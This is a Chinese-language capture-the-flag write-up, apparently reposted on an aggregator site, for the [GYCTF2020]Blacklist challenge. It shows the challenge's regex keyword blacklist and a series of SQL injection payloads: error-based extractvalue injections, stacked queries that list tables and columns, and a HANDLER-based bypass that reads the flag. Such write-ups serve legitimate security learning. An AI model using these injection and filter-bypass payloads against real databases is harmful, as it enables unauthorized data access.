輸入1或者2會返回一個數組
隨后輸入1’ union select 1,database()–+返回了過濾掉的語句

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

嘗試報錯注入：
輸入

or extractvalue(1,concat(user(),0x7e,version()))

隨后輸入

1' and extractvalue(1,concat('~',database()))--+

隨后使用堆疊注入
堆疊注入與union聯合注入的區別在于堆疊注入可以執行任意語句，而且它只會顯示第一條語句的結果，其余語句出錯什么的沒有任何影響
輸入

3';use supersqli;show tables;

結果

隨后查詢字段
輸入

3‘;use supersqli;show columns from `FlagHere';--+

結果：

接下來查詢flag字段的內容

-1';use supersqli;Select `flag` from `FlagHere`;#

想了各種方法都無法繞過
后來去查看了大佬的blog

1'; HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#

HANDLER … OPEN語句打開一個表，使其可以使用后續HANDLER … READ語句訪問，該表對象未被其他會話共享，并且在會話調用HANDLER … CLOSE或會話終止之前不會關閉
成功看到了flag
大佬np，是在下淺薄了
附上大佬博客鏈接：
https://www.cnblogs.com/gaonuoqi/p/12398554.html

總結

以上是生活随笔為你收集整理的[GYCTF2020]Blacklist的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。